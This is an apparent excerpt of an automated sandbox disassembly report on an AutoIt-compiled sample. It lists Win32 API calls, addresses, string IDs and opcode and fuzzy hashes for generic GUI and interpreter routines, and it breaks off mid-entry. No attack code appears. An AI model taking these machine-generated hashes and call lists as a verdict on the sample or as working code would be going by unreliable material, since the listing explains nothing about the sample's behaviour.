                                        • Instruction Fuzzy Hash: 99C192363051A30DDB6D4639843403EBEE15EA77B671A27EDE4B2EF5C4EF20E5249610
                                        APIs
                                        • CharUpperBuffW.USER32(?,?,00F0F910), ref: 00F038AF
                                        • IsWindowVisible.USER32(?), ref: 00F038D3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: BuffCharUpperVisibleWindow
                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                        • API String ID: 4105515805-45149045
                                        • Opcode ID: 8d7fd1bfa7a33fa8f29d270a87b063a641b36ca4c33cd3037bd1529a0ef4aa8a
                                        • Instruction ID: f3a289ba1d6da0b207771acb4217f9e722f03de8e974fd2d3a0923959db9ff68
                                        • Opcode Fuzzy Hash: 8d7fd1bfa7a33fa8f29d270a87b063a641b36ca4c33cd3037bd1529a0ef4aa8a
                                        • Instruction Fuzzy Hash: 3DD1A4716043058BCB14EF10C891A6A77E9EF98354F159459F88A6B3E3CB31EE0BEB41
                                        APIs
                                        • SetTextColor.GDI32(?,00000000), ref: 00F0A89F
                                        • GetSysColorBrush.USER32(0000000F), ref: 00F0A8D0
                                        • GetSysColor.USER32(0000000F), ref: 00F0A8DC
                                        • SetBkColor.GDI32(?,000000FF), ref: 00F0A8F6
                                        • SelectObject.GDI32(?,?), ref: 00F0A905
                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00F0A930
                                        • GetSysColor.USER32(00000010), ref: 00F0A938
                                        • CreateSolidBrush.GDI32(00000000), ref: 00F0A93F
                                        • FrameRect.USER32(?,?,00000000), ref: 00F0A94E
                                        • DeleteObject.GDI32(00000000), ref: 00F0A955
                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 00F0A9A0
                                        • FillRect.USER32(?,?,?), ref: 00F0A9D2
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00F0A9FD
                                          • Part of subcall function 00F0AB60: GetSysColor.USER32(00000012), ref: 00F0AB99
                                          • Part of subcall function 00F0AB60: SetTextColor.GDI32(?,?), ref: 00F0AB9D
                                          • Part of subcall function 00F0AB60: GetSysColorBrush.USER32(0000000F), ref: 00F0ABB3
                                          • Part of subcall function 00F0AB60: GetSysColor.USER32(0000000F), ref: 00F0ABBE
                                          • Part of subcall function 00F0AB60: GetSysColor.USER32(00000011), ref: 00F0ABDB
                                          • Part of subcall function 00F0AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F0ABE9
                                          • Part of subcall function 00F0AB60: SelectObject.GDI32(?,00000000), ref: 00F0ABFA
                                          • Part of subcall function 00F0AB60: SetBkColor.GDI32(?,00000000), ref: 00F0AC03
                                          • Part of subcall function 00F0AB60: SelectObject.GDI32(?,?), ref: 00F0AC10
                                          • Part of subcall function 00F0AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00F0AC2F
                                          • Part of subcall function 00F0AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F0AC46
                                          • Part of subcall function 00F0AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00F0AC5B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                        • String ID:
                                        • API String ID: 4124339563-0
                                        • Opcode ID: 921d167f2dd4f784c62c4324c9dbc90de69c878c4ea45ad1d30d63de728ae850
                                        • Instruction ID: e13158a6feaca2a82b6838d4095c51cc8e6cccb75c8989b19eb12c7251c7ad0f
                                        • Opcode Fuzzy Hash: 921d167f2dd4f784c62c4324c9dbc90de69c878c4ea45ad1d30d63de728ae850
                                        • Instruction Fuzzy Hash: 91A19C72508305EFD7209F64DC08A6BBBA9FF89331F144A29F962D61E0D735D848EB52
                                        APIs
                                        • DestroyWindow.USER32(00000000), ref: 00EF77F1
                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00EF78B0
                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00EF78EE
                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00EF7900
                                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00EF7946
                                        • GetClientRect.USER32(00000000,?), ref: 00EF7952
                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00EF7996
                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00EF79A5
                                        • GetStockObject.GDI32(00000011), ref: 00EF79B5
                                        • SelectObject.GDI32(00000000,00000000), ref: 00EF79B9
                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00EF79C9
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EF79D2
                                        • DeleteDC.GDI32(00000000), ref: 00EF79DB
                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00EF7A07
                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 00EF7A1E
                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00EF7A59
                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00EF7A6D
                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 00EF7A7E
                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00EF7AAE
                                        • GetStockObject.GDI32(00000011), ref: 00EF7AB9
                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00EF7AC4
                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00EF7ACE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                        • API String ID: 2910397461-517079104
                                        • Opcode ID: 989bc67ee921fff0ae3f374bdd0af56802331fb37d336e678fb2551d61d26345
                                        • Instruction ID: d44ac87204ec994e07373b72aadb0906a3459194818667b76febf9715cbd9e94
                                        • Opcode Fuzzy Hash: 989bc67ee921fff0ae3f374bdd0af56802331fb37d336e678fb2551d61d26345
                                        • Instruction Fuzzy Hash: 02A15F75A40219BFEB14DBA4DC4AFAE7BB9EB49710F044114FA19E72E0C7B0AD04DB61
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 00EEAF89
                                        • GetDriveTypeW.KERNEL32(?,00F0FAC0,?,\\.\,00F0F910), ref: 00EEB066
                                        • SetErrorMode.KERNEL32(00000000,00F0FAC0,?,\\.\,00F0F910), ref: 00EEB1C4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ErrorMode$DriveType
                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                        • API String ID: 2907320926-4222207086
                                        • Opcode ID: c82f5ff8c1501a6991ca82a93e1d60e4362846d52c078c6bf1362dfe17401c8b
                                        • Instruction ID: 9abbc3f335ec2f3b01adc6429f19620ac5393185bb445900719cb2cedb303f4d
                                        • Opcode Fuzzy Hash: c82f5ff8c1501a6991ca82a93e1d60e4362846d52c078c6bf1362dfe17401c8b
                                        • Instruction Fuzzy Hash: 7951C13068138DEBCB14EB13C9E29BE73F0AB54365B246026E44AB7291D735ED41EB43
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: __wcsnicmp
                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                        • API String ID: 1038674560-86951937
                                        • Opcode ID: 7dcaf03eff2bd46dc81def023a1571f228d9fbe427028ff8ce1462f4f1289fe2
                                        • Instruction ID: c759e0256e06fb9216690c9864a0f20e3954eaaad4eddecac0ba95c75d29e679
                                        • Opcode Fuzzy Hash: 7dcaf03eff2bd46dc81def023a1571f228d9fbe427028ff8ce1462f4f1289fe2
                                        • Instruction Fuzzy Hash: 888145B1600215BBCB25BF60CD82FEF37A8AF16704F046025F94DBA1C2EB60EA51D791
                                        APIs
                                        • DestroyWindow.USER32(?,?,?), ref: 00E82CA2
                                        • DeleteObject.GDI32(00000000), ref: 00E82CE8
                                        • DeleteObject.GDI32(00000000), ref: 00E82CF3
                                        • DestroyCursor.USER32(00000000), ref: 00E82CFE
                                        • DestroyWindow.USER32(00000000,?,?,?), ref: 00E82D09
                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 00EBC68B
                                        • 6F550200.COMCTL32(?,000000FF,?), ref: 00EBC6C4
                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00EBCAED
                                          • Part of subcall function 00E81B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E82036,?,00000000,?,?,?,?,00E816CB,00000000,?), ref: 00E81B9A
                                        • SendMessageW.USER32(?,00001053), ref: 00EBCB2A
                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00EBCB41
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: DestroyMessageSendWindow$DeleteObject$CursorF550200InvalidateMoveRect
                                        • String ID: 0
                                        • API String ID: 2586706302-4108050209
                                        • Opcode ID: 3084c8f4d4bcf36ba6c4f94cddd97f1bb538b0aad7506be72575b0488234fa1d
                                        • Instruction ID: 6ca861d91b18a2507552a23fb36f331c56ac147dc5429b0b1db9e60b8e5fbeb6
                                        • Opcode Fuzzy Hash: 3084c8f4d4bcf36ba6c4f94cddd97f1bb538b0aad7506be72575b0488234fa1d
                                        • Instruction Fuzzy Hash: C412A130608201EFDB24DF24C884BAAB7E5BF45304F64556DF59AEB662C731EC41DB91
                                        APIs
                                        • GetSysColor.USER32(00000012), ref: 00F0AB99
                                        • SetTextColor.GDI32(?,?), ref: 00F0AB9D
                                        • GetSysColorBrush.USER32(0000000F), ref: 00F0ABB3
                                        • GetSysColor.USER32(0000000F), ref: 00F0ABBE
                                        • CreateSolidBrush.GDI32(?), ref: 00F0ABC3
                                        • GetSysColor.USER32(00000011), ref: 00F0ABDB
                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F0ABE9
                                        • SelectObject.GDI32(?,00000000), ref: 00F0ABFA
                                        • SetBkColor.GDI32(?,00000000), ref: 00F0AC03
                                        • SelectObject.GDI32(?,?), ref: 00F0AC10
                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00F0AC2F
                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F0AC46
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00F0AC5B
                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F0ACA7
                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00F0ACCE
                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00F0ACEC
                                        • DrawFocusRect.USER32(?,?), ref: 00F0ACF7
                                        • GetSysColor.USER32(00000011), ref: 00F0AD05
                                        • SetTextColor.GDI32(?,00000000), ref: 00F0AD0D
                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00F0AD21
                                        • SelectObject.GDI32(?,00F0A869), ref: 00F0AD38
                                        • DeleteObject.GDI32(?), ref: 00F0AD43
                                        • SelectObject.GDI32(?,?), ref: 00F0AD49
                                        • DeleteObject.GDI32(?), ref: 00F0AD4E
                                        • SetTextColor.GDI32(?,?), ref: 00F0AD54
                                        • SetBkColor.GDI32(?,?), ref: 00F0AD5E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                        • String ID:
                                        • API String ID: 1996641542-0
                                        • Opcode ID: 0a1a80616519edfb19ac855b972a81db0bd4d9e1a39f1aa1872c1f7a794476a4
                                        • Instruction ID: 34b303649f8572aeffba43643b59e7ae6818e60c33d09b0474452c240be5fc1d
                                        • Opcode Fuzzy Hash: 0a1a80616519edfb19ac855b972a81db0bd4d9e1a39f1aa1872c1f7a794476a4
                                        • Instruction Fuzzy Hash: 6F614D71D00218EFDF219FA4DC48EAE7BB9FB08320F158125F915AB2E1D6759D40EB90
                                        APIs
                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00F08D34
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F08D45
                                        • CharNextW.USER32(0000014E), ref: 00F08D74
                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00F08DB5
                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00F08DCB
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F08DDC
                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00F08DF9
                                        • SetWindowTextW.USER32(?,0000014E), ref: 00F08E45
                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00F08E5B
                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F08E8C
                                        • _memset.LIBCMT ref: 00F08EB1
                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00F08EFA
                                        • _memset.LIBCMT ref: 00F08F59
                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00F08F83
                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00F08FDB
                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 00F09088
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00F090AA
                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F090F4
                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F09121
                                        • DrawMenuBar.USER32(?), ref: 00F09130
                                        • SetWindowTextW.USER32(?,0000014E), ref: 00F09158
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                        • String ID: 0
                                        • API String ID: 1073566785-4108050209
                                        • Opcode ID: 75dad3ff763309b7bdf55cc49dc88aeda6671628561ec07b211f85068361f81c
                                        • Instruction ID: 4c7ae112bcca969d9433e2dada842e012e7c4f14e3cabc5fa928c991c0e591b4
                                        • Opcode Fuzzy Hash: 75dad3ff763309b7bdf55cc49dc88aeda6671628561ec07b211f85068361f81c
                                        • Instruction Fuzzy Hash: 45E19071901209ABDF209F60CC84EEE7BB9FF05760F108159F955AA2D1DB709A86FF60
                                        APIs
                                        • GetCursorPos.USER32(?), ref: 00F04C51
                                        • GetDesktopWindow.USER32 ref: 00F04C66
                                        • GetWindowRect.USER32(00000000), ref: 00F04C6D
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00F04CCF
                                        • DestroyWindow.USER32(?), ref: 00F04CFB
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00F04D24
                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F04D42
                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00F04D68
                                        • SendMessageW.USER32(?,00000421,?,?), ref: 00F04D7D
                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00F04D90
                                        • IsWindowVisible.USER32(?), ref: 00F04DB0
                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00F04DCB
                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00F04DDF
                                        • GetWindowRect.USER32(?,?), ref: 00F04DF7
                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00F04E1D
                                        • GetMonitorInfoW.USER32(00000000,?), ref: 00F04E37
                                        • CopyRect.USER32(?,?), ref: 00F04E4E
                                        • SendMessageW.USER32(?,00000412,00000000), ref: 00F04EB9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                        • String ID: ($0$tooltips_class32
                                        • API String ID: 698492251-4156429822
                                        • Opcode ID: 28600dbb76e568d6e14543f74da680be5795b70f018cc676f58faf295e73402c
                                        • Instruction ID: 5bd5b3ee407792f1075ccaff9007a29efa8732f1bf09c819b8d2fc8ce9ddde79
                                        • Opcode Fuzzy Hash: 28600dbb76e568d6e14543f74da680be5795b70f018cc676f58faf295e73402c
                                        • Instruction Fuzzy Hash: 7CB18FB1A04340AFDB14DF64C845B6ABBE4FF84710F04891CF599AB2A1D771EC05EB55
                                        APIs
                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E828BC
                                        • GetSystemMetrics.USER32(00000007), ref: 00E828C4
                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E828EF
                                        • GetSystemMetrics.USER32(00000008), ref: 00E828F7
                                        • GetSystemMetrics.USER32(00000004), ref: 00E8291C
                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00E82939
                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00E82949
                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00E8297C
                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00E82990
                                        • GetClientRect.USER32(00000000,000000FF), ref: 00E829AE
                                        • GetStockObject.GDI32(00000011), ref: 00E829CA
                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E829D5
                                          • Part of subcall function 00E82344: GetCursorPos.USER32(?), ref: 00E82357
                                          • Part of subcall function 00E82344: ScreenToClient.USER32(00F467B0,?), ref: 00E82374
                                          • Part of subcall function 00E82344: GetAsyncKeyState.USER32(00000001), ref: 00E82399
                                          • Part of subcall function 00E82344: GetAsyncKeyState.USER32(00000002), ref: 00E823A7
                                        • SetTimer.USER32(00000000,00000000,00000028,00E81256), ref: 00E829FC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                        • String ID: AutoIt v3 GUI
                                        • API String ID: 1458621304-248962490
                                        • Opcode ID: 4dc17e0545de0f251d43837afb591add014f4124e6bbc62cb1c84fed417e032f
                                        • Instruction ID: 6a9f63ee3f401661a406faf7b773db282d56314721f80ac0e336bc9d9d852fb3
                                        • Opcode Fuzzy Hash: 4dc17e0545de0f251d43837afb591add014f4124e6bbc62cb1c84fed417e032f
                                        • Instruction Fuzzy Hash: 6EB15E75A0020AAFDB14EFA8DC45BEE7BB4FB08714F109229FA19E7290DB749841DB51
                                        APIs
                                        • CharUpperBuffW.USER32(?,?), ref: 00F040F6
                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00F041B6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
